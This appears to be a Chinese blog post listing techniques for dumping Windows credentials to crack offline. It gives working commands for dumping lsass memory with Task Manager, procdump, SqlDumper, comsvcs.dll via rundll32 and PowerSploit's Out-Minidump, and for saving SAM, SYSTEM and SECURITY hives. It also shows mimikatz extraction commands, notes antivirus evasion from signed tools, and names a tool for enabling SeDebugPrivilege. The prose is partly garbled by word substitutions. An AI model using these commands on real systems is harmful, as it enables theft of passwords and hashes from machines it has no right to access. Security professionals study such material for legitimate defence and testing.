离线解密windows凭证的常见方式总结

前言

本文总结常见的离线解密hash的方式，如有不对之处，还请各位师傅斧正。

任务管理器

以管理员身份翻开任务管理器,选中lsass进程，创立转储文件

之后会显现转储文件保管的位置

之后运转mimikatz本地解密

sekurlsa::minidump C:\Users\root\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

Procdump

运用Procdump(管理员权限)停止进程转储，能够下载具有微软签名的procdump，具备一定的免杀才能
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

之后对导出的凭据停止解密

sqldumper

SQLDumper.exe包含在Microsoft SQL和Office中，可生成完好转储文件
sqldumper的常见途径如下

C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe

C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe

之后运转

SqlDumper.exe <lsass pid> 0 0x01100

再本地解密即可

comsvcs.dll

运用 rundll32找到机器的comsvcs.dll,之后以powershell(管理员)运转以下命令

Get-Process lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full

之后本地解密

这里测试cmd不能导出文件，后来经过搜索发如今dump指定进程内存文件时，需求开启SeDebugPrivilege权限。而在cmd中此权限是默许禁用的，powershell是默许启用的。

简单处理方法：我们能够在cmd中开启此权限
运用工具https://github.com/daem0nc0re/PrivFu/tree/main/SwitchPriv 来切换权限

注册表导出sam文件

system文件位置:C:\Windows\System32\config\SYSTEM
SAM文件位置:C:\Windows\System32\config\SAM

reg save HKLM\SYSTEM C:\system.hiv 

reg save HKLM\sam C:\sam.hiv

之后对导出的sam文件停止解密

lsadump::sam /sam:C:\sam.hiv /system:C:\system.hiv

这里也能够导出HKLM\security，然后mimikatz离线解密

Out-Minidump

运用powershell脚本：https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
运转

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

感谢您的来访，获取更多精彩文章请收藏本站。